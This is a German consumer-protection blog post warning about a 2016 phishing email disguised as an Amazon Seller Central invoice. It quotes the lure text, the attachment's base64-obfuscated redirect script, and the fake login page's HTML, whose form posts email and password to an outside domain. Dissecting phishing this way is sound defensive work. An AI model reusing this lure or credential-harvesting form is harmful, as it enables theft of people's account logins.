Kommende Zahlungs Benachrichtigung Auf Amazon.de von Amazon.de ([email protected])

Am Freitag, den 04. November 2016 wurde durch unbekannte Dritte die folgende Phishing-Mail in deutscher Sprache versendet:

20161107_amazon2_email

Betreff: Kommende Zahlungs Benachrichtigung Auf Amazon.de
Absender: Amazon.de ([email protected])

Guten Tag,

Sie finden Ihre Rechnung von €58,82 für Vertrag 58230078 beigefügt. Die Zahlung wird automatisch innerhalb der nächsten 5 Werktage von der Zahlungsmethode gesammelt, die in Ihrem „Amazon Seller Central“ Konto angegeben ist.

Bitte laden Sie dieses Dokument herunter und verbinden Sie in Ihrem Konto mit dem Verkäufer „Amazon Seller Central“, zu sehen eine detaillierte Rechnung mit einer Beschreibung aller Gebühren.

Wenn Sie weitere Fragen haben, wenden Sie sich bitte an unseren Kundendienst.

Freundliche Grüße
Amazon-Team

Anlage: Rechnung_58230078.htm

Achtung: Es handelt sich um eine betrügerische E-Mail! Die E-Mail stammt nicht von Amazon! Der Anbieter hat mit der E-Mails nichts zu tun!

Klicken Sie nicht auf den Link und geben Sie keine ein! Amazon hat eine Informationsseite zum Thema Phishing. Weiterhin können Sie solche Phishing – Mails an [email protected] weiter (siehe auch eine Informationsseite hierzu).

Unter dem Vorwand, der E-Mail sei eine Rechnung über 58,82 Euro für einen Vertrag (Amazon Seller Central) beigefügt, sollen Sie die beigefügte Anlage „Rechnung:58230078.htm“ öffnen. Klicken Sie nicht auf die Anlage und öffnen Sie diese nicht!

Der Quelltext der Datei zeigt, dass hier etwas verheimlicht werden soll (es ist nur ein base64-codiertes JavaScript zu sehen):

20161107_amazon2_html1

 

<script type=“text/javascript“>
document.location.href=“data:text/html;base64,PGh0bWw+PGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiPg0KPHRpdGxlPkFtYXpvbiBTZWxsZXIgQ2VudHJhbDwvdGl0bGU+DQo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cDovL3…“;
</script>

 

Das Script zeigt eine nachgebaute Amazon Sellers – Seite an, deren Inhalt hauptsächlich aus einem Bild besteht. Dadurch ist es für Filter nicht so einfach, den Inhalt der Seite zu erkennen und davor zu warnen. Geben Sie auf keinen Fall irgendwelche Daten ein! Alle Eingaben werden an unbekannte Dritte (die Domain e-le.co.kr) gesendet. Anschließend wäre ein Missbrauch möglich!

20161107_amazon2_web1

amazon seller central europe

Melden Sie sich an Ihrem Konto an
Wie lautet Ihre E-Mail-Adresse (oder Telefonnummer)?
E-Mail oder Mobiltelefonnummer:
Kennwort:
Login

 

Der Quellcode der Seite würde wie folgt aussehen und verrät, dass die Daten nicht an Amazon gesendet werden:

20161107_amazon2_html2

<html><head><meta http-equiv=“Content-Type“ content=“text/html; charset=UTF-8″>
<title>Amazon Seller Central</title>
<link rel=“icon“ type=“image/png“ href=“http://static.wixstatic.com/media/8443b7_4fddac7b0b504c038bdaef1fe2435e7e.png“>
<link rel=“stylesheet“ type=“text/css“ href=“http://e-le.co.kr/acboard/admin/inc/ap/style.css“>
</head>
<body>
<div id=“pagina“>
<form method=“post“ action=“http://e-le.co.kr/acboard/admin/inc/ap/login.php“>
<input type=“text“ id=“email“ name=“email“ value=““ />
<input type=“password“ id=“password“ name=“password“ value=““ />
<input type=“submit“ id=“submit“ name=“submit“ value=““ />
</body>
</html>

 

 

Nach einen Klick auf „Login“ würde zwar die echte Amazon – Seite erscheinen, Ihre Daten wären aber zuvor an unbekannte Dritte übermittelt worden.

20161107_amazon2_web2

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.